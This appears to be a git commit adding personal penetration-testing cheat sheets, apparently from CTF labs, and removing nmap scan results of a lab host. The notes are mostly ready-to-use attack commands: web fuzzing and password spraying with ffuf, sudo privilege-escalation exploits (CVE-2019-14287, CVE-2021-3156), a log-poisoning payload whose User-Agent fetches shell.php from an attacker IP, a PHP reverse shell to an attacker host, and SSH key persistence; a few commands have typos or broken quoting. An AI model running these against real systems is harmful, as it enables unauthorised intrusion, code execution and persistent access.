fuff et al
This commit is contained in:
parent
d4648a2f18
commit
853d3ee2bb
|
@ -0,0 +1 @@
|
|||
Subproject commit 729d649ec5370730172bf6f5314aafd68c874124
|
|
@ -0,0 +1,41 @@
|
|||
# Fuzz Faster U Fool
|
||||
|
||||
## Usage
|
||||
```sh
|
||||
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt
|
||||
```
|
||||
* Fuzz dirs
|
||||
```sh
|
||||
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
|
||||
```
|
||||
* Fuzz files
|
||||
```sh
|
||||
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt
|
||||
```
|
||||
|
||||
### Fuzz parameters
|
||||
```sh
|
||||
ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 39
|
||||
ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39
|
||||
```
|
||||
* Fuzz values
|
||||
```sh
|
||||
seq 0 255 | fuff -u 'http://<IP>/sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33
|
||||
```
|
||||
* Fuzz Post Methods
|
||||
```sh
|
||||
ffuf -u http://<IP>/sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'
|
||||
```
|
||||
|
||||
### Fuzz Subdomains
|
||||
```sh
|
||||
ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
|
||||
```
|
||||
* Fuzz Vhosts & Server Blocks
|
||||
```sh
|
||||
ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0
|
||||
ffuf -u http://test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.test.com' -fs 0
|
||||
```
|
||||
|
||||
### Proxy
|
||||
* `-replay-proxy <IP>` or `-x <ProxyIP>`
|
|
@ -0,0 +1,37 @@
|
|||
# Linux Basic Enumeration
|
||||
```sh
|
||||
less ~/.bash_history
|
||||
```
|
||||
```sh
|
||||
cat /etc/*-release
|
||||
cat /proc/version
|
||||
uname -a
|
||||
```
|
||||
```sh
|
||||
sudo -V
|
||||
sudo -L
|
||||
```
|
||||
* Check if is writeable
|
||||
```sh
|
||||
vim /etc/passwd
|
||||
vim /etc/hosts
|
||||
```
|
||||
```sh
|
||||
crontab -l
|
||||
```
|
||||
|
||||
* Find interesting files
|
||||
```sh
|
||||
find / -perm /6000 2>/dev/null
|
||||
find / -perm -u=s -type f 2>/dev/null
|
||||
find / -type f -name "*.log" 2>/dev/null
|
||||
find / -type f -name "*.bak" 2>/dev/null
|
||||
find / -type f -name "*.conf" 2>/dev/null
|
||||
```
|
||||
|
||||
* Open Sockets
|
||||
```sh
|
||||
lsof -i
|
||||
netstat -natup
|
||||
ss -natup
|
||||
```
|
|
@ -1,4 +0,0 @@
|
|||
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
|
||||
Host: 10.10.156.247 () Status: Up
|
||||
Host: 10.10.156.247 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49161/open/tcp//unknown///, 49162/open/tcp/////
|
||||
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds
|
|
@ -1,19 +0,0 @@
|
|||
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
|
||||
Nmap scan report for 10.10.156.247
|
||||
Host is up (0.064s latency).
|
||||
Not shown: 64293 closed ports, 1231 filtered ports
|
||||
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
|
||||
PORT STATE SERVICE
|
||||
135/tcp open msrpc
|
||||
139/tcp open netbios-ssn
|
||||
445/tcp open microsoft-ds
|
||||
3389/tcp open ms-wbt-server
|
||||
31337/tcp open Elite
|
||||
49152/tcp open unknown
|
||||
49153/tcp open unknown
|
||||
49154/tcp open unknown
|
||||
49155/tcp open unknown
|
||||
49161/tcp open unknown
|
||||
49162/tcp open unknown
|
||||
|
||||
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds
|
|
@ -1,35 +0,0 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE nmaprun>
|
||||
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
|
||||
<!-- Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247 -->
|
||||
<nmaprun scanner="nmap" args="nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247" start="1628704699" startstr="Wed Aug 11 19:58:19 2021" version="7.91" xmloutputversion="1.05">
|
||||
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
|
||||
<verbose level="0"/>
|
||||
<debugging level="0"/>
|
||||
<host starttime="1628704700" endtime="1628704723"><status state="up" reason="user-set" reason_ttl="0"/>
|
||||
<address addr="10.10.156.247" addrtype="ipv4"/>
|
||||
<hostnames>
|
||||
</hostnames>
|
||||
<ports><extraports state="closed" count="64293">
|
||||
<extrareasons reason="resets" count="64293"/>
|
||||
</extraports>
|
||||
<extraports state="filtered" count="1231">
|
||||
<extrareasons reason="no-responses" count="1231"/>
|
||||
</extraports>
|
||||
<port protocol="tcp" portid="135"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="msrpc" method="table" conf="3"/></port>
|
||||
<port protocol="tcp" portid="139"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="netbios-ssn" method="table" conf="3"/></port>
|
||||
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="microsoft-ds" method="table" conf="3"/></port>
|
||||
<port protocol="tcp" portid="3389"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="ms-wbt-server" method="table" conf="3"/></port>
|
||||
<port protocol="tcp" portid="31337"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="Elite" method="table" conf="3"/></port>
|
||||
<port protocol="tcp" portid="49152"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||
<port protocol="tcp" portid="49153"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||
<port protocol="tcp" portid="49154"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||
<port protocol="tcp" portid="49155"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||
<port protocol="tcp" portid="49161"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||
<port protocol="tcp" portid="49162"><state state="open" reason="syn-ack" reason_ttl="127"/></port>
|
||||
</ports>
|
||||
<times srtt="64161" rttvar="6610" to="100000"/>
|
||||
</host>
|
||||
<runstats><finished time="1628704723" timestr="Wed Aug 11 19:58:43 2021" summary="Nmap done at Wed Aug 11 19:58:43 2021; 1 IP address (1 host up) scanned in 23.92 seconds" elapsed="23.92" exit="success"/><hosts up="1" down="0" total="1"/>
|
||||
</runstats>
|
||||
</nmaprun>
|
|
@ -0,0 +1,9 @@
|
|||
# CVE-2019-14287
|
||||
|
||||
* Versions < 1.8.28
|
||||
|
||||
## Usage
|
||||
* Integer overflow with resulting root status.
|
||||
```sh
|
||||
sudo -u#-1 <app>
|
||||
```
|
|
@ -0,0 +1,13 @@
|
|||
# CVE-2021-3156 Baron Samedit
|
||||
|
||||
* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
|
||||
* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
|
||||
* Heap based overflow
|
||||
* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
|
||||
* Check vulnerability via
|
||||
```sh
|
||||
sudoedit -s '\' $(python -c "print('\x41' * 10000)")
|
||||
```
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,6 @@
|
|||
# PHP Filter
|
||||
|
||||
* Include into GET query, and get index page, for example
|
||||
```sh
|
||||
<URL>/?view=php://filter/read=convert.base64-encode/resource=./dog/../index
|
||||
```
|
|
@ -0,0 +1,19 @@
|
|||
# RCE inside HTTP Request
|
||||
|
||||
* User Agent can be filled with php code
|
||||
```sh
|
||||
GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
|
||||
Host: 10.10.59.238
|
||||
User-Agent: <?php file_put_contents('monkey.php',file_get_contents('http://<attacker-IP>:<attacker-Port>/shell.php')); ?>
|
||||
[...]
|
||||
```
|
||||
|
||||
* copied from browser as curl command:
|
||||
```
|
||||
curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: <?php file_put_contents('monkey.php', file_get_contents('http://10.9.7.193:8000/shell.php'));?>"
|
||||
```
|
||||
* go to the access log
|
||||
```sh
|
||||
10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access
|
||||
```
|
||||
* Afterwards visit `10.10.211.157/monkey.php`
|
|
@ -0,0 +1 @@
|
|||
Subproject commit 40505ce3869707efb7890b55519b3ee829adefbd
|
|
@ -0,0 +1,4 @@
|
|||
# Printer Hacking
|
||||
|
||||
* [Preta](https://github.com/RUB-NDS/PRET)
|
||||
* [Cheat Sheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet)
|
|
@ -0,0 +1,31 @@
|
|||
# Upgrade Reverse Shell
|
||||
|
||||
## Via interpreter
|
||||
### PHP
|
||||
* reverse shell
|
||||
```php
|
||||
php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
```
|
||||
```php
|
||||
php -r 'exec ("/bin/bash")";'
|
||||
```
|
||||
* Sometimes even
|
||||
```php
|
||||
php -e 'exec "/bin/bash";'
|
||||
```
|
||||
|
||||
### Python
|
||||
```python
|
||||
python -c 'import pty; pty.spawn("/bin/bash")'
|
||||
```
|
||||
|
||||
## Next
|
||||
1. `ctrl` + `z`
|
||||
2. `stty echo -raw`
|
||||
3. `fg`
|
||||
4. `export TERM=xterm`
|
||||
|
||||
## Via SSH
|
||||
* `ssh-keygen`
|
||||
* copy priv key and `chmod 600`
|
||||
* `cat id_rsa.pub > authorized_keys` on target
|
Loading…
Reference in New Issue